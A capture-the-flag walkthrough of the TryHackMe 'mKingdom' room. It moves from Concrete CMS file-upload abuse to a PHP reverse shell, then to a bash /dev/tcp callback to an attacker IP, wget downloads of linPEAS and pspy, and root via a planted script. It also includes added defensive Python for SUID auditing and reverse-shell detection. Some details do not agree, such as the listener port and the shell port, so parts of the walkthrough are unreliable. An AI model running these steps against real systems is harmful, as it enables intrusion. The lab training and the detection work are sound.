mKingdom (TryHackMe) writeup
The first step is to scan the target IP address with nmap.
nmap -A <target_ip>
Next, access the web server at http://<target_ip>.
Next, use gobuster to brute-force directory and file paths on the web server.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://<target_ip> -x html,js,txt,php -t 20
Next, go to the /app directory and you will see a Jump button.
After clicking the Jump button, a pop-up message will be displayed. Click the OK button on this pop-up to proceed.
The web server will redirect you to the /app/castle directory.
And if you look closely, you’ll see that the blog was created by a user named “admin”.
By scrolling down the page, you will find a button labeled “login”.
When you click the login button, the web server will take you to the /app/castle/index.php/login page.
We attempted to log in using the username “admin” and a guessed password.
Noticing a CMS icon, we used Wappalyzer to gather more information about the web server and found that Concrete CMS version 8.5.2 is in use.
A security assessment of Concrete CMS 8.5.2 revealed a critical vulnerability in the File Manager, exposing the system to potential Remote Code Execution attacks.
Next, navigate to System & Settings > Allowed File Types to review the permitted upload types, and add PHP as an allowed file type.
Next, go to File > Upload File and select a PHP reverse shell file to upload.
After that, use the nc command on the attacking machine to listen for the incoming connection (nc -lvnp takes the listening port, not an IP address):
nc -lvnp <port>
Trigger the uploaded shell by opening it through the ‘URL to File’ option; it then connects back to the listener.
Switch back to the terminal and run the whoami command to check the current session and user identity.
After that, use the ls command to look for interesting directories. The /etc directory stood out; inside it the passwd file was found and viewed with cat passwd.
Execute the following to upgrade to an interactive bash session using Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then locate files with the SUID bit set:
find / -type f -perm -04000 -ls 2>/dev/null
The output reveals a file named ‘toad’ that is owned by the root user.
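As an added, defender-side counterpart to the SUID hunt above (not part of the original writeup), the following Python script enumerates SUID files the way the find command does and reports any that are not in a baseline; the baseline set and the sample tree it builds are constructed assumptions.

```python
import os
import stat
import tempfile

# Constructed baseline: SUID binaries a stock Linux install is expected to ship
# (assumption; trim it to what your own gold image actually contains).
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/openssh/ssh-keysign",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, nothing to audit there

def find_suid_files(root="/"):
    """Return [(path, owner_uid)] for regular files with the SUID bit set under root.
    Equivalent to 'find / -type f -perm -04000 -ls', but never follows symlinks."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        if dirpath in SKIP_DIRS:
            dirnames[:] = []  # prune the walk below this directory
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished while walking; ignore
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return found

def unexpected_suid(found, baseline=BASELINE_SUID):
    """SUID files not in the baseline. Root-owned ones (uid 0) sort first: they run as
    root for whoever executes them, which is exactly what made 'toad' interesting."""
    extra = [(p, uid) for p, uid in found if p not in baseline]
    return sorted(extra, key=lambda e: (e[1] != 0, e[0]))

def make_demo_tree():
    """Build a constructed sample tree: one SUID file ('toad') and one ordinary file."""
    base = tempfile.mkdtemp(prefix="suid_demo_")
    suid_path = os.path.join(base, "toad")
    plain_path = os.path.join(base, "notes.txt")
    for p in (suid_path, plain_path):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)   # rwsr-xr-x
    os.chmod(plain_path, 0o644)
    return base

if __name__ == "__main__":
    for path, uid in unexpected_suid(find_suid_files(make_demo_tree())):
        print(f"unexpected SUID file: {path} (owner uid {uid})")
```

Run it against "/" on a host to diff the live SUID set against your baseline; anything root-owned and not in the list deserves a look.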
Execute cat /home/toad/.bashrc to view the hidden .bashrc file in the home directory of the user toad. This file contains a token named PWD_Token, which can then be decoded.
After that, use the su command with the username ‘mario’ and the decoded password to switch user. Then run sudo -l to list the commands the current user is allowed to run with sudo privileges.
Running sudo /usr/bin/id invokes the id command with elevated privileges, returning the detailed identity information for the current (or a specified) user as root would see it.
Use cd ~ to return to the home directory, then ls -la to list all files and directories, including hidden ones. You will see a file named user.txt; however, cat user.txt fails because you do not have permission to read it.
Running python3 -m http.server 80 starts a basic HTTP server on port 80 using Python 3. It serves the contents of the current directory over HTTP and is commonly used to serve the linPEAS script after downloading it. Then use wget <target_ip>/linPEAS to download the linPEAS script from the specified IP address.
After that, use chmod +x on the downloaded file to add execute permission.
This sequence is a common step in a vulnerability assessment or penetration testing engagement. Running linPEAS with root privileges exposes a wide range of system information, including sensitive configuration files. The path /var/www/html/app/castle/application/config/database.php stands out because it is where the CMS stores its database credentials, so an attacker would target it to compromise the database and reach sensitive data.
After authenticating with the obtained credentials, enumerate the environment variables with the env command. One variable, ‘PWD_token’, is of interest: decoding it yields a value matching the user’s username, ‘mario’, which indicates a link between the user’s identity and the encoded token in the environment.
Next, install pspy to monitor processes, including commands executed with root privileges. Download it with wget <your_ip_address>/pspy64. pspy gives valuable insight into system behaviour without requiring root access.
Create a file named counter.sh in the directory /home/benjawan/app/castle/application containing the following (the original had a stray space in the /dev/tcp path and redirected only stdout; the corrected one-liner is):
bash -i >& /dev/tcp/10.17.18.85/4567 0>&1
Use the network utility nc to listen for the connection:
nc -lvnp 1338
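As an added detection example (not from the original writeup), this Python snippet scans process-monitor lines in a constructed pspy-like format for the techniques used above: the bash /dev/tcp reverse shell and the python pty upgrade. The line format, rule names and sample lines are all assumptions built for this illustration.

```python
import re

# Indicators drawn from the techniques used in this writeup (assumption: extend for your estate).
RULES = [
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    ("interactive shell with stdio redirected",
     re.compile(r"\bbash\s+-i\b.*(?:>&|&>|>\s*/dev/tcp).*\b0>&1")),
    ("pty upgrade via python",
     re.compile(r"python3?\s+-c\s+.*pty\.spawn\(")),
]
# Constructed line shape loosely modelled on pspy output (assumption): "... CMD: UID=<n> PID=<n> | <cmd>"
LINE_RE = re.compile(r"UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Parse monitor lines and return alerts as (uid, pid, [rule names]).
    UID=0 hits matter most: a root-run job executing a user-writable script is the
    exact path this box was escalated through."""
    alerts = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a process line; skip
        uid, pid, cmd = int(m.group(1)), int(m.group(2)), m.group(3)
        hits = classify(cmd)
        if hits:
            alerts.append((uid, pid, hits))
    return alerts

# Constructed sample: a root cron job runs a user-writable script that now spawns a reverse shell.
SAMPLE = [
    "2024/01/01 12:00:01 CMD: UID=0    PID=1201   | /bin/sh -c /home/benjawan/app/castle/application/counter.sh",
    "2024/01/01 12:00:01 CMD: UID=0    PID=1202   | bash -i >& /dev/tcp/10.17.18.85/4567 0>&1",
    "2024/01/01 12:00:05 CMD: UID=1000 PID=1210   | python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2024/01/01 12:00:09 CMD: UID=33   PID=1215   | /usr/bin/php /var/www/html/app/castle/index.php",
]

if __name__ == "__main__":
    for uid, pid, hits in scan(SAMPLE):
        print(f"UID={uid} PID={pid}: {', '.join(hits)}")
```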
Use a command-line editor to modify the /etc/hosts file, which Linux and Unix systems use to map hostnames such as ‘mkingdom.thm’ to their IP addresses.
After confirming the session with the whoami command, use cat to display the ‘flag’ from the file ‘root.txt’.